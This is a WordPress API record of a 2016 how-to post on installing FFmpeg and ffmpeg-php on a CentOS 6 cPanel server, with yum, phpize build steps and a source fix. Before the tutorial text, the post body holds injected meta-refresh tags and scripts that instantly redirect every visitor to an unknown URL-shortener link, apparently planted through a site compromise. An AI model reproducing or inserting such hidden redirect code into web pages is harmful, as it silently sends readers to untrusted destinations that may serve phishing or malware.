{"id":6578,"date":"2016-01-04T13:06:04","date_gmt":"2016-01-04T13:06:04","guid":{"rendered":"http:\/\/kb.onlinesupport4u.in\/?p=269"},"modified":"2016-01-04T13:06:04","modified_gmt":"2016-01-04T13:06:04","slug":"how-to-install-ffmpeg-php-ffmpeg-on-cpanel","status":"publish","type":"post","link":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/","title":{"rendered":"How to install FFmpeg  &#038; PHP-FFmpeg on cPanel"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/huiPfeX0r0\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.today\/huiPfeX0r0\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/huiPfeX0r0\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.today\/huiPfeX0r0\";<\/script><br \/>\nBy Default ffmpeg rpms are not added in centos yum repositories<\/p>\n<p>a new repository will have to be added to install ffmpeg<\/p>\n<p>For centos6 64bit OS<\/p>\n<p>run below commands,<\/p>\n<pre>wget http:\/\/pkgs.repoforge.org\/rpmforge-release\/rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm\nrpm -ivh rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm<\/pre>\n<p>Once done<\/p>\n<p># yum install ffmpeg ffmpeg-devel<\/p>\n<p>This will install ffmpeg on server<\/p>\n<p>Now once this is done<\/p>\n<p>you will need to install ffmpeg-php for php to recognize ffmpeg<\/p>\n<p>Below are the steps<\/p>\n<p>#wget http:\/\/sourceforge.net\/projects\/ffmpeg-php\/files\/ffmpeg-php\/0.6.0\/ffmpeg-php-0.6.0.tbz2<\/p>\n<p># tar -xvf\u00a0 ffmpeg-php-0.6.0.tbz2<\/p>\n<p>#cd ffmpeg-php-0.6.0<\/p>\n<p>#phpize<\/p>\n<p>#.\/configure<\/p>\n<p>#make &amp;&amp; make install<\/p>\n<p>now you need to add ffmpeg.so module in php.ini<\/p>\n<p>add \u00a0 extension=ffmpeg.so and restart httpd<\/p>\n<p>You can check for ffmpeg in phpinfo page<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Note: You may get error &#8221; error: \u2018new_le\u2019 undeclared (first use in this function)&#8221; while running make command<\/p>\n<p>You need to make modification in below file ffmpeg_movie.c which is in ffmpeg-php-0.6.0<\/p>\n<table style=\"height: 158px;\" width=\"578\">\n<tbody>\n<tr>\n<td class=\"votecell\"><\/td>\n<td class=\"answercell\">\n<div class=\"post-text\">\n<p>&nbsp;<\/p>\n<p>Changes in ffmpeg_movie.c:<\/p>\n<ul>\n<li>row 311: <code>list_entry *le;<\/code> to <code>zend_rsrc_list_entry *le;<\/code><\/li>\n<li>row 346: <code>list_entry new_le;<\/code> to <code>zend_rsrc_list_entry new_le;<\/code><\/li>\n<li>row 360: <code>hashkey_length+1, (void *)&amp;new_le, sizeof(list_entry),<\/code> to <code>hashkey_length+1, (void *)&amp;new_le,sizeof(zend_rsrc_list_entry),<\/code><\/li>\n<\/ul>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>By Default ffmpeg rpms are not added in centos yum repositories a new repository will have to be added to install ffmpeg For centos6 64bit OS run below commands, wget http:\/\/pkgs.repoforge.org\/rpmforge-release\/rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm rpm -ivh rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm Once done # yum install ffmpeg ffmpeg-devel This will install ffmpeg on server Now once this is done you will need [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7639,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[34,35],"tags":[109,110],"class_list":["post-6578","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cpanel","category-linux","tag-cpanel-ffmpeg","tag-ffmpeg"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>How to install FFmpeg &amp; PHP-FFmpeg on cPanel - Aarvi Server Solutions<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How to install FFmpeg &amp; PHP-FFmpeg on cPanel - Aarvi Server Solutions\" \/>\n<meta property=\"og:description\" content=\"By Default ffmpeg rpms are not added in centos yum repositories a new repository will have to be added to install ffmpeg For centos6 64bit OS run below commands, wget http:\/\/pkgs.repoforge.org\/rpmforge-release\/rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm rpm -ivh rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm Once done # yum install ffmpeg ffmpeg-devel This will install ffmpeg on server Now once this is done you will need [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/\" \/>\n<meta property=\"og:site_name\" content=\"Aarvi Server Solutions\" \/>\n<meta property=\"article:published_time\" content=\"2016-01-04T13:06:04+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2022\/12\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel_6578.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"600\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Prasad Naik\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Prasad Naik\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\\\/\"},\"author\":{\"name\":\"Prasad Naik\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#\\\/schema\\\/person\\\/c80edf3cd17550fb03e57e42f107261e\"},\"headline\":\"How to install FFmpeg &#038; PHP-FFmpeg on cPanel\",\"datePublished\":\"2016-01-04T13:06:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\\\/\"},\"wordCount\":166,\"publisher\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel_6578.jpg\",\"keywords\":[\"cpanel ffmpeg\",\"ffmpeg\"],\"articleSection\":[\"cPanel\",\"Linux\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\\\/\",\"url\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\\\/\",\"name\":\"How to install FFmpeg & PHP-FFmpeg on cPanel - Aarvi Server Solutions\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel_6578.jpg\",\"datePublished\":\"2016-01-04T13:06:04+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\\\/#primaryimage\",\"url\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel_6578.jpg\",\"contentUrl\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel_6578.jpg\",\"width\":800,\"height\":600},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"How to install FFmpeg &#038; PHP-FFmpeg on cPanel\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#website\",\"url\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/\",\"name\":\"Aarvi Server Solutions\",\"description\":\"cpanel server management\",\"publisher\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#organization\",\"name\":\"Aarvi Server Solutions\",\"url\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/aarvi-logo-2.png\",\"contentUrl\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/aarvi-logo-2.png\",\"width\":1016,\"height\":264,\"caption\":\"Aarvi Server Solutions\"},\"image\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#\\\/schema\\\/person\\\/c80edf3cd17550fb03e57e42f107261e\",\"name\":\"Prasad Naik\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e66b3251764796ab26e84f3fd94d32920872fbcecbb9126527107146ef9a9258?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e66b3251764796ab26e84f3fd94d32920872fbcecbb9126527107146ef9a9258?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e66b3251764796ab26e84f3fd94d32920872fbcecbb9126527107146ef9a9258?s=96&d=mm&r=g\",\"caption\":\"Prasad Naik\"},\"sameAs\":[\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\"],\"url\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/author\\\/prasad-naik\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How to install FFmpeg & PHP-FFmpeg on cPanel - Aarvi Server Solutions","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/","og_locale":"en_US","og_type":"article","og_title":"How to install FFmpeg & PHP-FFmpeg on cPanel - Aarvi Server Solutions","og_description":"By Default ffmpeg rpms are not added in centos yum repositories a new repository will have to be added to install ffmpeg For centos6 64bit OS run below commands, wget http:\/\/pkgs.repoforge.org\/rpmforge-release\/rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm rpm -ivh rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm Once done # yum install ffmpeg ffmpeg-devel This will install ffmpeg on server Now once this is done you will need [&hellip;]","og_url":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/","og_site_name":"Aarvi Server Solutions","article_published_time":"2016-01-04T13:06:04+00:00","og_image":[{"width":800,"height":600,"url":"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2022\/12\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel_6578.jpg","type":"image\/jpeg"}],"author":"Prasad Naik","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Prasad Naik","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/#article","isPartOf":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/"},"author":{"name":"Prasad Naik","@id":"https:\/\/aarviserversolutions.co.in\/wps\/#\/schema\/person\/c80edf3cd17550fb03e57e42f107261e"},"headline":"How to install FFmpeg &#038; PHP-FFmpeg on cPanel","datePublished":"2016-01-04T13:06:04+00:00","mainEntityOfPage":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/"},"wordCount":166,"publisher":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/#organization"},"image":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/#primaryimage"},"thumbnailUrl":"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2025\/09\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel_6578.jpg","keywords":["cpanel ffmpeg","ffmpeg"],"articleSection":["cPanel","Linux"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/","url":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/","name":"How to install FFmpeg & PHP-FFmpeg on cPanel - Aarvi Server Solutions","isPartOf":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/#website"},"primaryImageOfPage":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/#primaryimage"},"image":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/#primaryimage"},"thumbnailUrl":"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2025\/09\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel_6578.jpg","datePublished":"2016-01-04T13:06:04+00:00","breadcrumb":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/#primaryimage","url":"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2025\/09\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel_6578.jpg","contentUrl":"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2025\/09\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel_6578.jpg","width":800,"height":600},{"@type":"BreadcrumbList","@id":"https:\/\/aarviserversolutions.co.in\/wps\/how-to-install-ffmpeg-php-ffmpeg-on-cpanel\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/aarviserversolutions.co.in\/wps\/"},{"@type":"ListItem","position":2,"name":"How to install FFmpeg &#038; PHP-FFmpeg on cPanel"}]},{"@type":"WebSite","@id":"https:\/\/aarviserversolutions.co.in\/wps\/#website","url":"https:\/\/aarviserversolutions.co.in\/wps\/","name":"Aarvi Server Solutions","description":"cpanel server management","publisher":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/aarviserversolutions.co.in\/wps\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/aarviserversolutions.co.in\/wps\/#organization","name":"Aarvi Server Solutions","url":"https:\/\/aarviserversolutions.co.in\/wps\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/aarviserversolutions.co.in\/wps\/#\/schema\/logo\/image\/","url":"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2021\/07\/aarvi-logo-2.png","contentUrl":"https:\/\/aarviserversolutions.co.in\/wps\/wp-content\/uploads\/2021\/07\/aarvi-logo-2.png","width":1016,"height":264,"caption":"Aarvi Server Solutions"},"image":{"@id":"https:\/\/aarviserversolutions.co.in\/wps\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/aarviserversolutions.co.in\/wps\/#\/schema\/person\/c80edf3cd17550fb03e57e42f107261e","name":"Prasad Naik","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/e66b3251764796ab26e84f3fd94d32920872fbcecbb9126527107146ef9a9258?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/e66b3251764796ab26e84f3fd94d32920872fbcecbb9126527107146ef9a9258?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e66b3251764796ab26e84f3fd94d32920872fbcecbb9126527107146ef9a9258?s=96&d=mm&r=g","caption":"Prasad Naik"},"sameAs":["https:\/\/aarviserversolutions.co.in\/wps"],"url":"https:\/\/aarviserversolutions.co.in\/wps\/author\/prasad-naik\/"}]}},"_links":{"self":[{"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/posts\/6578","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/comments?post=6578"}],"version-history":[{"count":0,"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/posts\/6578\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/media\/7639"}],"wp:attachment":[{"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/media?parent=6578"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/categories?post=6578"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/aarviserversolutions.co.in\/wps\/wp-json\/wp\/v2\/tags?post=6578"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}